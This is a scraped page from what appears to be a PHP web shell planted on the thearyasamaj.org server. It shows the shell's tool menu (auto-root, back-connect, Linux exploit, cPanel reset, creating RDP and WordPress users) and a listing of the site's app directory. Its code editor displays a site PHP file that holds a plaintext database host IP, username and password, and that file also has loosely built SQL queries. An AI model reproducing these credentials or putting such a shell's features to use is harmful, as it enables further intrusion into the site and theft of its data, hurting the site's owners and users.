Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
apps /
[ HOME SHELL ]
Name
Size
Permission
Action
aryaSamajImages
[ DIR ]
drwxr-xr-x
bhajans
[ DIR ]
drwxr-xr-x
login
[ DIR ]
drwxr-xr-x
.ftpquota
11
B
-rw-r--r--
aryasamajws.php
3.1
KB
-rw-r--r--
aryasamajwslike.php
1.67
KB
-rw-r--r--
error_log
4.39
MB
-rw-r--r--
mservices.php
512
B
-rw-r--r--
new_sendmessage.php
2.46
KB
-rw-r--r--
new_sendmessage2.php
2.29
KB
-rw-r--r--
portscan.php
272
B
-rw-r--r--
sendmessage.php
2.89
KB
-rw-r--r--
sendmessage_aryasamaj.php
2.87
KB
-rw-r--r--
simplepush.php
1.52
KB
-rw-r--r--
storeregid1.php
729
B
-rw-r--r--
storetoken.php
870
B
-rw-r--r--
storetoken_aryasamaj.php
918
B
-rw-r--r--
tbl_info.php
511
B
-rw-r--r--
tbl_services.php
515
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : storetoken_aryasamaj.php
<?php mysql_connect("46.4.149.39","thearyas","K(TddG)rx,EK") or die("not able to connect"); mysql_select_db("thearyas_asmapp") or die("db not accessible"); if(isset($_REQUEST["tid"]) && isset($_REQUEST["build"])) { $tid=mysql_real_escape_string($_REQUEST["tid"]); $build=$_REQUEST["build"]; if($build == "production") $qry="select * from tokens"; else $qry="select * from tokens_dev"; $rs=mysql_query($qry) or die(mysql_error()); while($row = mysql_fetch_row($rs)) { if($row[0]==$tid) { echo "This token already exists within the db"; exit(0); } } $num_rows=mysql_num_rows($rs); if($build == "production") $insquery="insert into tokens (token_name) values ('".$tid."')"; else $insquery="insert into tokens_dev (token_name) values ('".$tid."')"; mysql_query($insquery) or die(mysql_error()); echo "Entered token in database"; } else { echo "enter a token and build type"; } ?>
Close